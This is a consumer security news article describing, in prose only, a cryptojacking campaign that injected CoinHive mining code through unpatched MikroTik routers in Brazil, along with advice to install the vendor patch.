You probably don't concern yourself much with what is going on in Brazil, especially as it pertains to the country's routers. But if what's going on in the South American country is a precursor for what is to come, you'll want to know what's up.
Trustwave security researcher Simon Kenin discovered something on July 31 after taking notice of a huge surge of CoinHive activity in the country. CoinHive is a mining service that relies on a small bit of computer code that is installed on websites, one that uses all the computing power of whatever browser that visits the site and uses its machine to mine Monero cryptocurrency.
While concerning on its own, Kenin noticed something unique about the surge. It was not only what was happening, but how that raised some red flags.
Mikrotik network devices were involved
That the main source was Brazil was not necessarily surprising, since it is one of the most populated countries in the world and has plenty of home and small business networks that could be attacked.
But why just Mikrotik routers?
Kenin looked into everything he was seeing, trying to figure out what was happening. He at first thought it might be a zero day exploit, possibly in the Mikrotik httpproxy component.
But he realized that was not it. No, this attack was ongoing and purely exploiting routers that did not take advantage of a patch offered on April 23, Release 6.42.1, which was meant to prevent this very thing from happening.
At the time, Mikrotik noticed there was a vulnerability that, as they put it, "allowed a special tool to connect to the Winbox port, and request the system user database file." Mikrotik had stored both usernames and passwords in plaintext, which offers a treasure trove for would-be hackers.
Mikrotik noticing there was an issue and doing what they could to fix it is admirable, but something like that is useless unless people download it. With hundreds of thousands of routers in the world, there's a good many that did not get updated.
At the time there was no surefire way to know if a router had been affected, which is why Mikrotik wanted people to assume they were and upgrade their router as well as change passwords and add a firewall.
So what happens?
Essentially criminals enter into the unpatched router and gain remote administrator access by targeting Winbox. Rather than running a malicious executable on the router itself, however, the attacker piggybacks on the device's functionality to inject the CoinHive script into every webpage the person visited.
The mining is done via error pages, as the attackers replaced a file called "error.html," which is transmitted by Mikrotik's built-in web proxy whenever there is an HTTP error. The router, which becomes a bit of a zombie at that point, loads the CoinHive browser-based cryptomining software.
What does that mean? Well, if you log onto any network that is running an unpatched Mikrotik router that is configured to push all HTTP traffic through its web proxy, there's a good chance you'll end up cryptomining for the criminals every time there is a browsing issue.
Now, it's unlikely they will make a ton of money off of this scheme, given that it involves just one brand of router and will only launch when there's an error to report. Furthermore, the mining only lasts as long as you are using the browser with the tap for the cryptomining code still in it and Mikrotik's proxy supports HTTP and not HTTPS.
That said, you are likely to notice the cryptomining if it is happening, especially if you are running a laptop and the cooling fans kick in due to overuse.
This infiltration is both clever and bad in that, as Kenin wrote, the attacker is not infecting small sites with a few visitors or finding "sophisticated" ways to run malware on end user computers, but instead is going straight to the source in carrier-grade routers.
Want to avoid an issue?
For this, it's really quite simple. If you have a Mikrotik router, grab the patch. Whether it's to avoid the cryptojacking or not, it's best to make sure no one can remotely access your router and hack you for any reason, with any goal.
That really goes for all routers and devices, not just Mikrotik. Hackers and criminals are always on the lookout for new ways to make some money, and it's often difficult for technology companies to stay a step ahead.
But when they do recognize a problem and offer a way to fix or prevent it from becoming a real issue, it is best to take advantage and protect yourself.
Speaking of security
Our Sponsor F-Secure's FREEDOME VPN is exceptionally easy to install and to use. Just one push of a button your privacy is protected. Try it free for five days at F-secure.com/kim. You'll also get 20 percent off with discount code KIM at checkout!
5th most popular site in the world hacked, what you need to do now
Here we go again - another day, another data breach. The latest incident follows a string of high profile data breaches that were revealed this past year. This time, the world's fifth most popular website, also known as the front page of the internet, has been hacked! Tap or click here for more.